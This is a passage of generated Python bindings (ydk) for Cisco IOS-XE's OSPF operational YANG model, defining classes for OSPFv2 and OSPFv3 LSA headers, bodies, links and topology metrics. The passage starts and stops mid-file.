**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: body_flag_options
LSA body flags
**type**\: :py:class:`Ospfv2LsaBodyFlagsOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaBodyFlagsOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, self).__init__()
self.yang_name = "lsa-body"
self.yang_parent_name = "ospfv2-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network))])
self._leafs = OrderedDict([
('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])),
('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])),
('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])),
('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])),
])
self.num_of_links = None
self.summary_mask = None
self.external_mask = None
self.body_flag_options = Bits()
self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network()
self.network.parent = self
self._children_name_map["network"] = "network"
self._segment_path = lambda: "lsa-body"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value)
# Generated ydk binding for the OSPFv2 network-LSA body container.
class Network(Entity):
    """
    Network details

    .. attribute:: network_mask
    IP network mask
    **type**\: union of the below types:
    **type**\: str
    **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
    **type**\: str
    **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
    **config**\: False

    .. attribute:: attached_router
    List of the routers attached to the network
    **type**\: list of int
    **range:** 0..4294967295
    **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize generated YANG metadata and leaf values."""
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__()

        self.yang_name = "network"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Leaf container with no child containers.
        self._child_classes = OrderedDict([])
        # Python attribute -> (YLeaf descriptor, accepted python type names);
        # attached-router is a leaf-list, hence YLeafList.
        self._leafs = OrderedDict([
            ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])),
            ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
        ])
        self.network_mask = None
        self.attached_router = []
        self._segment_path = lambda: "network"
        # Freeze last: later attribute writes are validated by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Validate writes via ydk helper; listed names are the settable leafs.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value)
# Generated ydk binding for one router-LSA link entry (keyed YANG list).
class Ospfv2Link(Entity):
    """
    Router LSA link

    .. attribute:: link_id (key)
    Link ID
    **type**\: int
    **range:** 0..4294967295
    **config**\: False

    .. attribute:: link_data (key)
    Link data
    **type**\: int
    **range:** 0..4294967295
    **config**\: False

    .. attribute:: type
    Link type
    **type**\: int
    **range:** 0..255
    **config**\: False

    .. attribute:: ospfv2_topology
    Topology specific information
    **type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology>`
    **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize generated YANG metadata, list keys and leaf values."""
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link, self).__init__()

        self.yang_name = "ospfv2-link"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # This node is a YANG list keyed by (link-id, link-data).
        self.ylist_key_names = ['link_id','link_data']
        self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology))])
        # NOTE: 'type' shadows the builtin, but the name is fixed by the
        # generated public interface and must stay as-is.
        self._leafs = OrderedDict([
            ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
            ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
            ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
        ])
        self.link_id = None
        self.link_data = None
        self.type = None
        # Child list of per-topology metrics.
        self.ospfv2_topology = YList(self)
        # Segment path embeds both key leafs, evaluated lazily.
        self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
        # Freeze last: later attribute writes are validated by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Validate writes via ydk helper; listed names are the settable leafs.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value)

    # Generated ydk binding for the per-topology metric list under this link.
    class Ospfv2Topology(Entity):
        """
        Topology specific information

        .. attribute:: mt_id (key)
        MT\-ID for topology enabled link
        **type**\: int
        **range:** 0..4294967295
        **config**\: False

        .. attribute:: metric
        Metric for the topology
        **type**\: int
        **range:** 0..65535
        **config**\: False
        """

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            """Initialize generated YANG metadata, list key and leaf values."""
            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__()

            self.yang_name = "ospfv2-topology"
            self.yang_parent_name = "ospfv2-link"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            # YANG list keyed by mt-id.
            self.ylist_key_names = ['mt_id']
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
            ])
            self.mt_id = None
            self.metric = None
            self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
            # Freeze last: later attribute writes are validated by __setattr__.
            self._is_frozen = True

        def __setattr__(self, name, value):
            # Validate writes via ydk helper; listed names are the settable leafs.
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value)
# Generated ydk binding for the summary-LSA per-topology metric list
# (direct child of area-scope-lsa, distinct from Ospfv2Link.Ospfv2Topology).
class Ospfv2Topology(Entity):
    """
    Summary LSA

    .. attribute:: mt_id (key)
    MT\-ID for topology enabled link
    **type**\: int
    **range:** 0..4294967295
    **config**\: False

    .. attribute:: metric
    Metric for the topology
    **type**\: int
    **range:** 0..65535
    **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize generated YANG metadata, list key and leaf values."""
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology, self).__init__()

        self.yang_name = "ospfv2-topology"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # YANG list keyed by mt-id.
        self.ylist_key_names = ['mt_id']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
            ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
        ])
        self.mt_id = None
        self.metric = None
        self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
        # Freeze last: later attribute writes are validated by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Validate writes via ydk helper; listed names are the settable leafs.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value)
# Generated ydk binding for the OSPFv2 external-LSA entry (keyed by mt-id).
class Ospfv2External(Entity):
    """
    External LSA

    .. attribute:: mt_id (key)
    MT\-ID for topology enabled on the link
    **type**\: int
    **range:** 0..4294967295
    **config**\: False

    .. attribute:: metric
    Metric for the topology
    **type**\: int
    **range:** 0..4294967295
    **config**\: False

    .. attribute:: forwarding_address
    Forwarding address
    **type**\: union of the below types:
    **type**\: str
    **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
    **type**\: str
    **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
    **config**\: False

    .. attribute:: external_route_tag
    Route tag
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize generated YANG metadata, list key and leaf values."""
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External, self).__init__()

        self.yang_name = "ospfv2-external"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # YANG list keyed by mt-id.
        self.ylist_key_names = ['mt_id']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
            ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
        ])
        self.mt_id = None
        self.metric = None
        self.forwarding_address = None
        self.external_route_tag = None
        self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']"
        # Freeze last: later attribute writes are validated by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Validate writes via ydk helper; listed names are the settable leafs.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value)
class Ospfv3Lsa(Entity):
"""
OSPFv3 LSA
.. attribute:: header
Decoded OSPFv3 LSA header
**type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header>`
**config**\: False
.. attribute:: lsa_body
Decoded OSPFv3 LSA body
**type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody>`
**config**\: False
"""
# Class-body members of
# OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa
# (the `class Ospfv3Lsa(Entity)` statement and docstring appear just above).

# YANG module prefix and revision this binding was generated from.
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'

def __init__(self):
    """Initialize generated YANG metadata and the two child containers."""
    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, self).__init__()

    self.yang_name = "ospfv3-lsa"
    self.yang_parent_name = "area-scope-lsa"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # YANG child-container name -> (python attribute name, generated class).
    self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody))])
    # No leafs directly on this node.
    self._leafs = OrderedDict()
    # Pre-construct and parent the "header" and "lsa-body" containers.
    self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header()
    self.header.parent = self
    self._children_name_map["header"] = "header"
    self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody()
    self.lsa_body.parent = self
    self._children_name_map["lsa_body"] = "lsa-body"
    self._segment_path = lambda: "ospfv3-lsa"
    # Freeze last: later attribute writes are validated by __setattr__.
    self._is_frozen = True

def __setattr__(self, name, value):
    # Validate writes via ydk helper; this node has no settable leafs.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, [], name, value)
# Generated ydk binding for the decoded OSPFv3 LSA header container.
class Header(Entity):
    """
    Decoded OSPFv3 LSA header

    .. attribute:: lsa_id
    LSA ID
    **type**\: union of the below types:
    **type**\: str
    **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
    **type**\: str
    **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
    **config**\: False

    .. attribute:: lsa_header
    LSA header
    **type**\: :py:class:`LsaHeader <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader>`
    **config**\: False

    .. attribute:: lsa_hdr_options
    OSPFv3 LSA options
    **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
    **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize generated YANG metadata, leafs and the lsa-header child."""
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, self).__init__()

        self.yang_name = "header"
        self.yang_parent_name = "ospfv3-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader))])
        self._leafs = OrderedDict([
            ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
            ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])),
        ])
        self.lsa_id = None
        # Bit-flag leaf, modelled as a ydk Bits container.
        self.lsa_hdr_options = Bits()
        self.lsa_header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader()
        self.lsa_header.parent = self
        self._children_name_map["lsa_header"] = "lsa-header"
        self._segment_path = lambda: "header"
        # Freeze last: later attribute writes are validated by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Validate writes via ydk helper; listed names are the settable leafs.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, ['lsa_id', 'lsa_hdr_options'], name, value)

    # Generated ydk binding for the raw LSA header fields.
    class LsaHeader(Entity):
        """
        LSA header

        .. attribute:: age
        LSA age
        **type**\: int
        **range:** 0..65535
        **config**\: False

        .. attribute:: type
        LSA type
        **type**\: int
        **range:** 0..65535
        **config**\: False

        .. attribute:: adv_router
        LSA advertising router
        **type**\: int
        **range:** 0..4294967295
        **config**\: False

        .. attribute:: seq_num
        LSA sequence number
        **type**\: str
        **config**\: False

        .. attribute:: checksum
        LSA checksum
        **type**\: str
        **config**\: False

        .. attribute:: length
        LSA length
        **type**\: int
        **range:** 0..65535
        **config**\: False
        """

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            """Initialize generated YANG metadata and leaf values."""
            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, self).__init__()

            self.yang_name = "lsa-header"
            self.yang_parent_name = "header"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            # NOTE: 'type' shadows the builtin, but the name is fixed by the
            # generated public interface and must stay as-is.
            self._leafs = OrderedDict([
                ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
                ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
                ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
                ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
                ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
            ])
            self.age = None
            self.type = None
            self.adv_router = None
            self.seq_num = None
            self.checksum = None
            self.length = None
            self._segment_path = lambda: "lsa-header"
            # Freeze last: later attribute writes are validated by __setattr__.
            self._is_frozen = True

        def __setattr__(self, name, value):
            # Validate writes via ydk helper; listed names are the settable leafs.
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value)
class LsaBody(Entity):
"""
Decoded OSPFv3 LSA body
.. attribute:: network
OSPFv3 network
**type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network>`
**config**\: False
.. attribute:: prefix
OSPFv3 inter area prefix
**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix>`
**config**\: False
.. attribute:: ia_router
OSPFv3 inter area router
**type**\: :py:class:`IaRouter <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter>`
**config**\: False
.. attribute:: lsa_external
OSPFv3 LSA external
**type**\: :py:class:`LsaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal>`
**config**\: False
.. attribute:: nssa
OSPFv3 NSSA
**type**\: :py:class:`Nssa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa>`
**config**\: False
.. attribute:: link_data
OSPFv3 Link data
**type**\: :py:class:`LinkData <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData>`
**config**\: False
.. attribute:: ia_prefix
OSPFv3 Intra area prefixes
**type**\: :py:class:`IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix>`
**config**\: False
.. attribute:: lsa_flag_options
LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
.. attribute:: lsa_body_flags
LSA Body Flags
**type**\: :py:class:`Ospfv3LsaBodyFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaBodyFlagOptions>`
**config**\: False
"""
# Class-body members of
# OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody
# (the `class LsaBody(Entity)` statement and docstring appear just above).

# YANG module prefix and revision this binding was generated from.
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'

def __init__(self):
    """Initialize generated YANG metadata, bit-flag leafs and all child containers."""
    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, self).__init__()

    self.yang_name = "lsa-body"
    self.yang_parent_name = "ospfv3-lsa"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # YANG child-container name -> (python attribute name, generated class),
    # one entry per possible OSPFv3 LSA body variant.
    self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix))])
    self._leafs = OrderedDict([
        ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])),
        ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])),
    ])
    # Bit-flag leafs, modelled as ydk Bits containers.
    self.lsa_flag_options = Bits()
    self.lsa_body_flags = Bits()
    # Pre-construct and parent every body-variant child container.
    self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network()
    self.network.parent = self
    self._children_name_map["network"] = "network"
    self.prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix()
    self.prefix.parent = self
    self._children_name_map["prefix"] = "prefix"
    self.ia_router = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter()
    self.ia_router.parent = self
    self._children_name_map["ia_router"] = "ia-router"
    self.lsa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal()
    self.lsa_external.parent = self
    self._children_name_map["lsa_external"] = "lsa-external"
    self.nssa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa()
    self.nssa.parent = self
    self._children_name_map["nssa"] = "nssa"
    self.link_data = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData()
    self.link_data.parent = self
    self._children_name_map["link_data"] = "link-data"
    self.ia_prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix()
    self.ia_prefix.parent = self
    self._children_name_map["ia_prefix"] = "ia-prefix"
    self._segment_path = lambda: "lsa-body"
    # Freeze last: later attribute writes are validated by __setattr__.
    self._is_frozen = True

def __setattr__(self, name, value):
    # Validate writes via ydk helper; listed names are the settable leafs.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value)
# Generated ydk binding for the OSPFv3 network-LSA body container.
class Network(Entity):
    """
    OSPFv3 network

    .. attribute:: attached_router
    List of the routers attached to the network
    **type**\: list of int
    **range:** 0..4294967295
    **config**\: False

    .. attribute:: lsa_net_options
    Network LSA options
    **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
    **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize generated YANG metadata and leaf values."""
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, self).__init__()

        self.yang_name = "network"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # attached-router is a leaf-list (YLeafList); lsa-net-options is a
        # bit-flag leaf.
        self._leafs = OrderedDict([
            ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
            ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])),
        ])
        self.attached_router = []
        self.lsa_net_options = Bits()
        self._segment_path = lambda: "network"
        # Freeze last: later attribute writes are validated by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Validate writes via ydk helper; listed names are the settable leafs.
